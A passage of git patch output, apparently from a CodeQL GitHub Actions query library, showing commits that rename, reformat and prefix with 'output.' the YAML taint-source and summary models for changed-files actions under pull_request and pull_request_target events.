files" ] + - [ "jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files" ] \ No newline at end of file diff --git a/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml similarity index 56% rename from ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml rename to ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 28517f445682..a9db2714746f 100644 --- a/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -4,6 +4,4 @@ extensions: extensible: summaryModel data: - [ "mad9000/actions-find-and-replace-string", "*", "source", "value", "taint" ] - - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ] - - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ] - - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ] + - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions-changed-files.model.yml b/ql/lib/ext/tj-actions-changed-files.model.yml deleted file mode 100644 index a3f687a0611c..000000000000 --- a/ql/lib/ext/tj-actions-changed-files.model.yml +++ /dev/null @@ -1,28 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sourceModel - data: - - [ "tj-actions/changed-files", "*", "added_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "changed_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "copied_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "type_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unknown_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unmerged_files", "*", "PR changed files" ] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml new file mode 100644 index 000000000000..8e0189dcb676 --- /dev/null +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -0,0 +1,39 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files" ] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_verify-changed-files.yml b/ql/lib/ext/tj-actions_verify-changed-files.yml new file mode 100644 index 000000000000..55aebb0d34a4 --- /dev/null +++ b/ql/lib/ext/tj-actions_verify-changed-files.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files" ] + - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files" ] From fa91837f63dbd6cd399066fa386c93b0bddd5309 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 13 Feb 2024 13:22:18 +0100 Subject: [PATCH 026/707] Trim yaml --- .../ext/ahmadnassri_action-changed-files.yml | 8 +-- ql/lib/ext/dorny_paths-filter.yml | 4 +- .../frabert_replace-string-action.model.yml | 4 +- ql/lib/ext/jitterbit_get-changed-files.yml | 28 ++++---- ..._actions-find-and-replace-string.model.yml | 4 +- ql/lib/ext/tj-actions_changed-files.model.yml | 68 +++++++++---------- .../ext/tj-actions_verify-changed-files.yml | 4 +- 7 files changed, 60 insertions(+), 60 deletions(-) diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.yml b/ql/lib/ext/ahmadnassri_action-changed-files.yml index c5e4df09e3a4..bd86b3f843e1 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.yml @@ -3,7 +3,7 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files" ] - - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files" ] - - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files" ] - - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files" ] + - ["ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.yml b/ql/lib/ext/dorny_paths-filter.yml index c78e9e08e708..c9cdd2dbcc0f 100644 --- a/ql/lib/ext/dorny_paths-filter.yml +++ b/ql/lib/ext/dorny_paths-filter.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "dorny/paths-filter", "*", "changes", "pull_request", "PR changed files" ] - - [ "dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files" ] + - ["dorny/paths-filter", "*", "changes", "pull_request", "PR changed files"] + - ["dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index e211fe2b69c7..76ce81b394e4 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ] - - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ] + - ["frabert/replace-string-action", "*", "string", "replaced", "taint"] + - ["frabert/replace-string-action", "*", "replace-with", "replaced", "taint"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.yml b/ql/lib/ext/jitterbit_get-changed-files.yml index 8d2798f37367..198e60d42458 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.yml @@ -3,17 +3,17 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files" ] \ No newline at end of file + - ["jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index a9db2714746f..46a577d2f7e2 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - [ "mad9000/actions-find-and-replace-string", "*", "source", "value", "taint" ] - - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ] \ No newline at end of file + - ["mad9000/actions-find-and-replace-string", "*", "source", "value", "taint"] + - ["mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 8e0189dcb676..1ef816727e1f 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,37 +3,37 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files" ] \ No newline at end of file + - ["tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_verify-changed-files.yml b/ql/lib/ext/tj-actions_verify-changed-files.yml index 55aebb0d34a4..076ecff353c4 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files" ] - - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files" ] + - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files"] + - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files"] From 6627a858e379259e0f9dca2e1fbc54b0fbe5d736 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 13 Feb 2024 13:24:25 +0100 Subject: [PATCH 027/707] Suffix with `.model` --- ...anged-files.yml => ahmadnassri_action-changed-files.model.yml} | 0 .../ext/{dorny_paths-filter.yml => dorny_paths-filter.model.yml} | 0 ...et-changed-files.yml => jitterbit_get-changed-files.model.yml} | 0 ...hanged-files.yml => tj-actions_verify-changed-files.model.yml} | 0 4 files changed, 0 insertions(+), 0 deletions(-) rename ql/lib/ext/{ahmadnassri_action-changed-files.yml => ahmadnassri_action-changed-files.model.yml} (100%) rename ql/lib/ext/{dorny_paths-filter.yml => dorny_paths-filter.model.yml} (100%) rename ql/lib/ext/{jitterbit_get-changed-files.yml => jitterbit_get-changed-files.model.yml} (100%) rename ql/lib/ext/{tj-actions_verify-changed-files.yml => tj-actions_verify-changed-files.model.yml} (100%) diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml similarity index 100% rename from ql/lib/ext/ahmadnassri_action-changed-files.yml rename to ql/lib/ext/ahmadnassri_action-changed-files.model.yml diff --git a/ql/lib/ext/dorny_paths-filter.yml b/ql/lib/ext/dorny_paths-filter.model.yml similarity index 100% rename from ql/lib/ext/dorny_paths-filter.yml rename to ql/lib/ext/dorny_paths-filter.model.yml diff --git a/ql/lib/ext/jitterbit_get-changed-files.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml similarity index 100% rename from ql/lib/ext/jitterbit_get-changed-files.yml rename to ql/lib/ext/jitterbit_get-changed-files.model.yml diff --git a/ql/lib/ext/tj-actions_verify-changed-files.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml similarity index 100% rename from ql/lib/ext/tj-actions_verify-changed-files.yml rename to ql/lib/ext/tj-actions_verify-changed-files.model.yml From 29b3d6c9efe6993bf23dfb586c31e1a79939ac57 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 13 Feb 2024 15:00:53 +0100 Subject: [PATCH 028/707] Prefix sources with `output.` --- ...ahmadnassri_action-changed-files.model.yml | 8 +-- ql/lib/ext/dorny_paths-filter.model.yml | 4 +- .../ext/jitterbit_get-changed-files.model.yml | 28 ++++---- ql/lib/ext/tj-actions_changed-files.model.yml | 68 +++++++++---------- .../tj-actions_verify-changed-files.model.yml | 4 +- 5 files changed, 56 insertions(+), 56 deletions(-) diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index bd86b3f843e1..3308967eebc1 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,7 +3,7 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index c9cdd2dbcc0f..d2b2ed48fc5f 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "changes", "pull_request", "PR changed files"] - - ["dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files"] + - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"] + - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index 198e60d42458..bc7344eedca6 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -3,17 +3,17 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.added", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 1ef816727e1f..b3b8baed7fc0 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,37 +3,37 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", 